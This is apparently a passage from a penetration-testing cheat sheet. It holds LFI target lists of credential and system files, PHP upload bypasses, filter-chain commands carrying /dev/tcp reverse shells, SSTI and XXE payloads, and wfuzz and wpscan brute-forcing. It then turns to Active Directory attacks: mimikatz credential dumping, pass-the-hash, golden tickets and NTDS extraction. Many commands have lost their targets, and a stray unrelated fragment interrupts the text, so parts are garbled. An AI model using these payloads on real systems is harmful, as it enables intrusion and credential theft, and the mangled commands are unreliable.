/usr/local/apache/logs /usr/local/apache/logs/access_log /usr/local/apache/logs/access.log /usr/local/apache/audit_log /usr/local/apache/error_log /usr/local/apache/error.log /usr/local/cpanel/logs /usr/local/cpanel/logs/access_log /usr/local/cpanel/logs/error_log /usr/local/cpanel/logs/license_log /usr/local/cpanel/logs/login_log /usr/local/cpanel/logs/stats_log /usr/local/etc/httpd/logs/access_log /usr/local/etc/httpd/logs/error_log /usr/local/etc/php.ini /usr/local/etc/pure-ftpd.conf /usr/local/etc/pureftpd.pdb /usr/local/lib/php.ini /usr/local/php4/httpd.conf /usr/local/php4/httpd.conf.php /usr/local/php4/lib/php.ini /usr/local/php5/httpd.conf /usr/local/php5/httpd.conf.php /usr/local/php5/lib/php.ini /usr/local/php/httpd.conf /usr/local/php/httpd.conf.ini /usr/local/php/lib/php.ini /usr/local/pureftpd/etc/pure-ftpd.conf /usr/local/pureftpd/etc/pureftpd.pdn /usr/local/pureftpd/sbin/pure-config.pl /usr/local/www/logs/httpd_log /usr/local/Zend/etc/php.ini /usr/sbin/pure-config.pl /var/adm/log/xferlog /var/apache2/config.inc /var/apache/logs/access_log /var/apache/logs/error_log /var/cpanel/cpanel.config /var/lib/mysql/my.cnf /var/lib/mysql/mysql/user.MYD /var/local/www/conf/php.ini /var/log/apache2/access_log /var/log/apache2/access.log /var/log/apache2/error_log /var/log/apache2/error.log /var/log/apache/access_log /var/log/apache/access.log /var/log/apache/error_log /var/log/apache/error.log /var/log/apache-ssl/access.log /var/log/apache-ssl/error.log /var/log/auth.log /var/log/boot /var/htmp /var/log/chttp.log /var/log/cups/error.log /var/log/daemon.log /var/log/debug /var/log/dmesg /var/log/dpkg.log /var/log/exim_mainlog /var/log/exim/mainlog /var/log/exim_paniclog /var/log/exim.paniclog /var/log/exim_rejectlog /var/log/exim/rejectlog /var/log/faillog /var/log/ftplog /var/log/ftp-proxy /var/log/ftp-proxy/ftp-proxy.log /var/log/httpd-access.log /var/log/httpd/access_log /var/log/httpd/access.log /var/log/httpd/error_log /var/log/httpd/error.log /var/log/httpsd/ssl.access_log /var/log/httpsd/ssl_log /var/log/kern.log /var/log/lastlog /var/log/lighttpd/access.log /var/log/lighttpd/error.log /var/log/lighttpd/lighttpd.access.log /var/log/lighttpd/lighttpd.error.log /var/log/mail.info /var/log/mail.log /var/log/maillog /var/log/mail.warn /var/log/message /var/log/messages /var/log/mysqlderror.log /var/log/mysql.log /var/log/mysql/mysql-bin.log /var/log/mysql/mysql.log /var/log/mysql/mysql-slow.log /var/log/proftpd /var/log/pureftpd.log /var/log/pure-ftpd/pure-ftpd.log /var/log/secure /var/log/vsftpd.log /var/log/wtmp /var/log/xferlog /var/log/yum.log /var/mysql.log /var/run/utmp /var/spool/cron/crontabs/root /var/webmin/miniserv.log /var/www/html/__init__.py /var/www/html/db_connect.php /var/www/html/utils.php /var/www/log/access_log /var/www/log/error_log /var/www/logs/access_log /var/www/logs/error_log /var/www/logs/access.log /var/www/logs/error.log ~/.atfp_history ~/.bash_history ~/.bash_logout ~/.bash_profile ~/.bashrc ~/.gtkrc ~/.login ~/.logout ~/.mysql_history ~/.nano_history ~/.php_history ~/.profile ~/.ssh/authorized_keys ~/.ssh/id_dsa ~/.ssh/id_dsa.pub ~/.ssh/id_rsa ~/.ssh/id_rsa.pub ~/.ssh/identity ~/.ssh/identity.pub ~/.viminfo ~/.wm_style ~/.Xdefaults ~/.xinitrc ~/.Xresources ~/.xsession ##### Windows Files C:/Users/Administrator/NTUser.dat C:/Documents and Settings/Administrator/NTUser.dat C:/apache/logs/access.log C:/apache/logs/error.log C:/apache/php/php.ini C:/boot.ini C:/inetpub/wwwroot/global.asa C:/MySQL/data/hostname.err C:/MySQL/data/mysql.err C:/MySQL/data/mysql.log C:/MySQL/my.cnf C:/MySQL/my.ini C:/php4/php.ini C:/php5/php.ini C:/php/php.ini C:/Program Files/Apache Group/Apache2/conf/httpd.conf C:/Program Files/Apache Group/Apache/conf/httpd.conf C:/Program Files/Apache Group/Apache/logs/access.log C:/Program Files/Apache Group/Apache/logs/error.log C:/Program Files/FileZilla Server/FileZilla Server.xml C:/Program Files/MySQL/data/hostname.err C:/Program Files/MySQL/data/mysql-bin.log C:/Program Files/MySQL/data/mysql.err C:/Program Files/MySQL/data/mysql.log C:/Program Files/MySQL/my.ini C:/Program Files/MySQL/my.cnf C:/Program Files/MySQL/MySQL Server 5.0/data/hostname.err C:/Program Files/MySQL/MySQL Server 5.0/data/mysql-bin.log C:/Program Files/MySQL/MySQL Server 5.0/data/mysql.err C:/Program Files/MySQL/MySQL Server 5.0/data/mysql.log C:/Program Files/MySQL/MySQL Server 5.0/my.cnf C:/Program Files/MySQL/MySQL Server 5.0/my.ini C:/Program Files (x86)/Apache Group/Apache2/conf/httpd.conf C:/Program Files (x86)/Apache Group/Apache/conf/httpd.conf C:/Program Files (x86)/Apache Group/Apache/conf/access.log C:/Program Files (x86)/Apache Group/Apache/conf/error.log C:/Program Files (x86)/FileZilla Server/FileZilla Server.xml C:/Program Files (x86)/xampp/apache/conf/httpd.conf C:/WINDOWS/php.ini C:/WINDOWS/Repair/SAM C:/Windows/repair/system C:/Windows/repair/software C:/Windows/repair/security C:/WINDOWS/System32/drivers/etc/hosts C:/Windows/win.ini C:/WINNT/php.ini C:/WINNT/win.ini C:/xampp/apache/bin/php.ini C:/xampp/apache/logs/access.log C:/xampp/apache/logs/error.log C:/Windows/Panther/Unattend/Unattended.xml C:/Windows/Panther/Unattended.xml C:/Windows/debug/NetSetup.log C:/Windows/system32/config/AppEvent.Evt C:/Windows/system32/config/SecEvent.Evt C:/Windows/system32/config/default.sav C:/Windows/system32/config/security.sav C:/Windows/system32/config/software.sav C:/Windows/system32/config/system.sav C:/Windows/system32/config/regback/default C:/Windows/system32/config/regback/sam C:/Windows/system32/config/regback/security C:/Windows/system32/config/regback/system C:/Windows/system32/config/regback/software C:/Program Files/MySQL/MySQL Server 5.1/my.ini C:/Windows/System32/inetsrv/config/schema/ASPNET_schema.xml C:/Windows/System32/inetsrv/config/applicationHost.config C:/inetpub/logs/LogFiles/W3SVC1/u_ex[YYMMDD].log #### PDF PHP Inclusion Create a file with a PDF header, which contains PHP code. %PDF-1.4 http:///index.php?page=uploads/.pdf%00&cmd=whoami #### PHP Upload Filter Bypasses .sh .cgi .inc .txt .pht .phtml .phP .Php .php3 .php4 .php5 .php7 .pht .phps .phar .phpt .pgif .phtml .phtm .php%00.jpeg .php%20 .php%0d%0a.jpg .php%0a .php.jpg .php%00.gif .php\x00.gif .php%00.png .php\x00.png .php%00.jpg .php\x00.jpg mv .jpg .php\x00.jpg #### PHP Filter Chain Generator python3 php_filter_chain_generator.py --chain '' python3 php_filter_chain_generator.py --chain '' python3 php_filter_chain_generator.py --chain '& /dev/tcp// 0>&1"); ?>' python3 php_filter_chain_generator.py --chain '& /dev/tcp// 0>&1"); ?>' python3 php_filter_chain_generator.py --chain "& /dev/tcp// 0>&1\"'); ?>" python3 php_filter_chain_generator.py --chain "& /dev/tcp// 0>&1\"'); ?>" http:///?page=php://filter/convert.base64-decode/resource=PD9waHAgZWNobyBzaGVsbF9leGVjKGlkKTsgPz4 python3 php_filter_chain_generator.py --chain '' [+] The following gadget chain will generate the following code : (base64 value: PD89IGV4ZWMoJF9HRVRbMF0pOyA/Pg) php://filter/convert.iconv.UTF8.CSISO2022KR|convert.base64-encode|<--- SNIP --->|convert.iconv.UTF8.UTF7|convert.base64-decode/resource=php://temp&0= python3 php_filter_chain_generator.py --chain "& /dev/tcp// 0>&1\"'); ?>" | grep "^php" > curl "http:///index.php?file=$(cat )" #### PHP Generic Gadget Chains (PHPGGC) phpggc -u --fast-destruct Guzzle/FW1 /dev/shm/.txt /PATH/TO/FILE/.txt #### Server-Side Request Forgery (SSRF) https:///item/2?server=server./file?id=9&x= #### Server-Side Template Injection (SSTI) ##### Fuzz String ${{<%[%'"}}%\. ##### Magic Payload {{ ‘’.__class__.__mro__[1].__subclasses__() }} #### Upload Vulnerabilities ASP / ASPX / PHP / PHP3 / PHP5: Webshell / Remote Code Execution SVG: Stored XSS / Server-Side Request Forgery GIF: Stored XSS CSV: CSV Injection XML: XXE AVI: Local File Inclusion / Server-Side request Forgery HTML/JS: HTML Injection / XSS / Open Redirect PNG / JPEG: Pixel Flood Attack ZIP: Remote Code Exection via Local File Inclusion PDF / PPTX: Server-Side Request Forgery / Blind XXE #### wfuzz wfuzz -w /usr/share/wfuzz/wordlist/general/big.txt -u http:///FUZZ/.php --hc '403,404' ##### Write to File wfuzz -w /PATH/TO/WORDLIST -c -f -u http:// --hc 403,404 ##### Custom Scan with limited Output wfuzz -w /PATH/TO/WORDLIST -u http:///dev/304c0c90fbc6520610abbf378e2339d1/db/file_FUZZ.txt --sc 200 -t 20 ##### Fuzzing two Parameters at once wfuzz -w /usr/share/wordlists/seclists/Discovery/Web-Content/big.txt -u http://://FUZZ.FUZ2Z -z list,txt-php --hc 403,404 -c ##### Domain wfuzz --hh 0 -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt -H 'Host: FUZZ.' -u http:/// ##### Subdomain wfuzz -w /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-110000.txt -H "Host: FUZZ." --hc 200 --hw 356 -t 100 ##### Git wfuzz -w /usr/share/wordlists/seclists/Discovery/Web-Content/raft-medium-files-lowercase.txt -u http:///FUZZ --hc 403,404 ##### Login wfuzz -X POST -u "http://:/login.php" -d "email=FUZZ&password=" -w /PATH/TO/WORDLIST/ --hc 200 -c wfuzz -X POST -u "http://:/login.php" -d "username=FUZZ&password=" -w /PATH/TO/WORDLIST/ --ss "Invalid login" ##### SQL wfuzz -c -z file,/usr/share/wordlists/seclists/Fuzzing/SQLi/Generic-SQLi.txt -d 'db=FUZZ' --hl 16 http:///select http ##### DNS wfuzz -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt -H "Origin: http://FUZZ." --filter "r.headers.response~'Access-Control-Allow-Origin'" http:/// wfuzz -c -w /usr/share/wordlists/secLists/Discovery/DNS/subdomains-top1million-110000.txt --hc 400,404,403 -H "Host: FUZZ." -u http:// -t 100 wfuzz -c -w /usr/share/wordlists/secLists/Discovery/DNS/subdomains-top1million-110000.txt --hc 400,403,404 -H "Host: FUZZ." -u http:// --hw -t 100 ##### Numbering Files wfuzz -w /usr/share/wordlists/seclists/Fuzzing/4-digits-0000-9999.txt --hw 31 http://10.13.37.11/backups/backup_2021052315FUZZ.zip ##### Enumerating PIDs wfuzz -u 'http://backdoor.htb/wp-content/plugins/ebook-download/filedownload.php?ebookdownloadurl=/proc/FUZZ/cmdline' -z range,900-1000 #### WPProbe wpprobe scan -u https:/// wpprobe scan -f .txt -t 20 #### WPScan wpscan --url https:// --enumerate u,t,p wpscan --url https:// --plugins-detection aggressive wpscan --url https:// --disable-tls-checks wpscan --url https:// --disable-tls-checks --enumerate u,t,p wpscan --url http:// -U -P passwords.txt -t 50 #### XML External Entity (XXE) ##### Skeleton Payload Request GET / HTTP/1.1 Host: : User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Length: 136 :80/shell.php" >]> &xxe; ##### Payloads ]> &passwd;1 ]>3&test;
17th Estate, CA
username=%26username%3b&version=1.0.0-->+]>CkA ###### Execution $username = ''; $password = ''; $secureString = ConvertTo-SecureString $password -AsPlaintext -Force; $credential = New-Object System.Management.Automation.PSCredential $username, $secureString; $options = New-CimSessionOption -Protocol DCOM $session = New-Cimsession -ComputerName -Credential $credential -SessionOption $Options $command = 'powershell -nop -w hidden -e JAB<--- SNIP --->CkA'; Invoke-CimMethod -CimSession $Session -ClassName Win32_Process -MethodName Create -Arguments @{CommandLine =$Command}; ###### Windows Remote Shell (WinRS) ###### Prerequisites - User needs to be part of the Administrators or Remote Management Users group on the target host ###### Execution winrs -r: -u: -p: "cmd /c hostname & whoami" winrs -r: -u: -p: "powershell -nop -w hidden -e JAB<--- SNIP --->CkA" ###### PowerShell $username = ''; $password = ''; $secureString = ConvertTo-SecureString $password -AsPlaintext -Force; $credential = New-Object System.Management.Automation.PSCredential $username, $secureString; New-PSSession -ComputerName -Credential $credential Enter-PSSession 1 ###### PsExec .\PsExec64.exe -i \\ -u \ -p cmd ###### Pass the Hash (PtH) impacket-wmiexec -hashes :2892D26CDF84D7A70E2EB3B9F05C425E Administrator@ ###### Overpass the Hash .\mimikatz.exe mimikatz # privilege::debug mimikatz # sekurlsa::logonpasswords mimikatz # sekurlsa::pth /user: /domain: /ntlm:369def79d8372408bf6e93364cc93075 /run:powershell klist dir \\\ klist .\PsExec.exe \\ cmd ###### Pass the Ticket ###### Prerequisites - Export an already existing ticket of a user ###### Exporting the Ticket .\mimikatz.exe mimikatz # privilege::debug mimikatz #sekurlsa::tickets /export dir *.kirbi mimikatz # kerberos::ptt [0;12bd0]-0-0-40810000-@cifs-.kirbi klist .\PsExec.exe \\ cmd ###### Distributed Component Object Model (DCOM) ###### Prerequisites - Elevated PowerShell session ###### Creating and storing the Distributed Component Object Model $dcom = [System.Activator]::CreateInstance([type]::GetTypeFromProgID("MMC20.Application.1","")) $dcom.Document.ActiveView.ExecuteShellCommand("cmd",$null,"/c cmd","7") tasklist | findstr "cmd" $dcom.Document.ActiveView.ExecuteShellCommand("powershell",$null,"powershell -nop -w hidden -e JAB<--- SNIP --->CkA","7") ##### Active Directory Persistence ###### Golden Tickets ###### Prerequisites - Hash of krbtgt ###### Forge and Inject Golden Ticket .\mimikatz.exe mimikatz # privilege::debug mimikatz # lsadump::lsa /patch mimikatz # kerberos::purge mimikatz # kerberos::golden /user: /domain: /sid:S-1-5-21-1987370270-658905905-1781884369 /krbtgt:1693c6cefafffc7af11ef34d1c788f47 /ptt mimikatz # misc::cmd ###### Execution Use the `hostname` and not the `IP address` because otherwise it would authenticate via `NTLM` and the access would still be blocked. .\PsExec.exe \\ cmd ###### Volume Shadow Service (VSS) aka Shadow Copies ###### Create and collect necessary Files vshadow.exe -nw -p C: copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy2\windows\ntds\ntds.dit C:\ntds.dit.bak reg.exe save hklm\system C:\system.bak impacket-secretsdump -ntds ntds.dit.bak -system system.bak LOCAL #### Active Directory Certificate Services (AD CS) certipy-ad find -username '@' -password '' -dc-ip -vulnerable -stdout ##### ESC1: Misconfigured Certificate Templates certipy-ad req -ca '' -username '@' -password '' -target '' -template '